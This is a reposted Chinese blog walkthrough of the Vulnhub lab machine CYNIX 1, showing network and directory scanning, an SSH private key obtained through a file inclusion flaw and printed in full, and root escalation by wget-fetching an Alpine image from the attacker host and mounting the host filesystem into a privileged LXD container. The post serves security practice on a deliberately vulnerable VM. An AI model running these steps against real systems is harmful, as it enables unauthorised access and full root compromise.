【Vulnhub】靶机CYNIX1

admin 2022年1月10日03:33:47安全博客评论15 views2946字阅读9分49秒阅读模式

前言

  • Vulnhub刷题简单记录

CYNIX 1

描述

  • 级别:中-难
  • 用户标志:user.txt
  • 根标志:root.txt
  • 描述:这是一个 Boot2Root 机器。该机器与 VirtualBox 兼容,但也可以在 VMWare 中使用(未测试但应该可以使用)。DHCP 将自动分配 IP。您必须找到并读取分别存在于 user.txt 和 root.txt 中的两个标志(user 和 root)。尽情享受吧!

https://www.vulnhub.com/entry/cynix-1,394/

CYNIX 1

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
2
nmap -p- -T5 192.168.56.101 #全端口扫描
nmap -sV -sC -p 25,80,110,6688 -A 192.168.56.101 -o CyNix1

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
4
5
6
gobuster dir -u http://192.168.56.101/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10
0

dirb http://192.168.1.104/

dirsearch -u 192.168.136.150 -e* -x 403

4、通过找到文件包含漏洞获取私钥,就可以直接登录了

image-20210923160739207

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAk1VUtcYuZmM1Zmm4yNpguzzeocGpMVYC540yT90QqaD2Bsal
zYqvHKEh++bOL6QTSr0NjU9ifT/lBIVSIA0TpjUTkpdIW045H+NlgMhN0q/x6Yy2
LofuB4LQqRzr6cP0paoOYNq1KYG3QF1ouGa4k1i0td4DepBxcu4JBMOm20E7BurG
zo41f/YWjC5DurNjIchzl4GyBClMGSXWbIbr6sYwVx2OKyiPLFLYusrNqwJNQvxz
Mf5yolEYI8WOXJzCfiPQ5VG8KXBH3FHu+DhFNgrJQjgowD15ZMQ1qpO/2FMhewR6
gcDs7rCLUUXc9/7uJ7e3zHlUyDgxakYohn3YiQIDAQABAoIBAE/cfSJa3mPZeuSc
gfE9jhlwES2VD+USPljNDGyF47ZO7Y0WuGEFv43BOe6VWUYxpdNpTqM+WKCTtcwR
iEafT/tT4dwf7LSxXf2PAUIhUS3W+UYjY80tGTUxD3Hbn3UDJuV1nH2bj3+ENJTL
DSyHYZ1dA/dg9HnHOfeWV4UhmJxXmOAOKgU9Z73sPn4bYy4B3jnyqWn392MsQftr
69ZYauTjku9awpuR5MAXMJ9bApk9Q7LZYwwGaSZw8ceMEUj7hkZBtP9W9cilCOdl
rFXnkc8CvUpLh+hX6E/JOCGsUvdPuVLWKd2bgdK099GrRaenS8SlN0AUTfyNiqg4
VE7V8AECgYEAwoGVE+Z8Tn+VD5tzQ0twK+cP2TSETkiTduYxU3rLqF8uUAc3Ye/9
TLyfyIEvU7e+hoKltdNXHZbtGrfjVbz6gGuGehIgckHPsZCAQLPwwEqp0Jzz9eSw
qXI0uM7n2vSdEWfCAcJBc559JKZ5uwd0XwTPNhiUqe6DUDUOZ7kI34ECgYEAwenM
gMEaFOzr/gQsmBNyDj2gR2SuOYnOWfjUO3DDleP7yXYNTcRuy6ke1kvMhf9fWw7h
dq3ieU0KSHrNUQ9igFK5C8FvsB+HUyEjfVpNhFppNpWUUWKDRCypbmypLg0r+9I7
myrdBFoYv30WKVsEHus1ye4nJzKjCtkgmjYMfQkCgYA0hctcyVNt2xPEWCTC2j8b
C9UCwSStAvoXFEfjk/gkqjcWUyyIXMbYjuLSwNen0qk3J1ZaCAyxJ8009s0DnPlD
7kUs93IdiFnuR+fqEO0E7+R1ObzC/JMb3oQQF4cSYBV92rfPw8Xq07RVTkL21yd8
dQ8DO5YBYS/CW+Fc7uFPgQKBgHWAVosud792UQn7PYppPhOjBBw+xdPXzVJ3lSLv
kZSiMVBCWI1nGjwOnsD77VLFC+MBgV2IwFMAe9qvjvoveGCJv9d/v03ZzQZybi7n
KVGp91c8DEPEjgYhigl/joR5Ns3A9p1vu72HWret9F/a5wRVQqK5zL/Tzzgjmb3Y
QnkBAoGAVosEGOE7GzBMefGHjQGMNKfumeJ01+Av6siAI6gmXWAYBaU618XhFEh1
+QNoLgWvSXoBuN+pMkxnRCfMTNbD1wSk46tW3sWHkZdV31gKceOifNzMVw53bJHP
/kto0eGJ/vgM0g9eyqmcpPTVqf7EwkJdo0LngOprNyTk+54ZiUg=
-----END RSA PRIVATE KEY-----

image-20210923161703269

1
2
chmod 600 id_rsa
ssh -i id_rsa [email protected] -p 6688

5、利用lxd提权

1
2
3
4
git clone  https://github.com/saghul/lxd-alpine-builder.git
sudo ./build-alpine
python2 -m SimpleHTTPServer
wget http://192.168.56.1:8080/alpine-v3.14-x86_64-20210923_0451.tar.gz #传入目标机

6、用lxc提权

1
2
3
4
5
6
7
8
9
10
lxc image import ./alpine-v3.14-x86_64-20210923_0451.tar.gz --alias mygylq # 别名为mygylq

lxc image list #查看

lxc init mygylq mygylq -c security.privileged=true #初始化镜像

lxc config device add mygylq mygylq disk source=/ path=/mnt/root recursive=true #加载容器

lxc start mygylq #启动
lxc exec mygylq /bin/sh #进入root的sh

image-20210923171534155

image-20210923171914279

总结

就是将整个机子里面的目录,在复制进我们创建的容器中,就可以看到root的用户的文件了。

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【Vulnhub】靶机CYNIX1 http://cn-sec.com/archives/730029.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: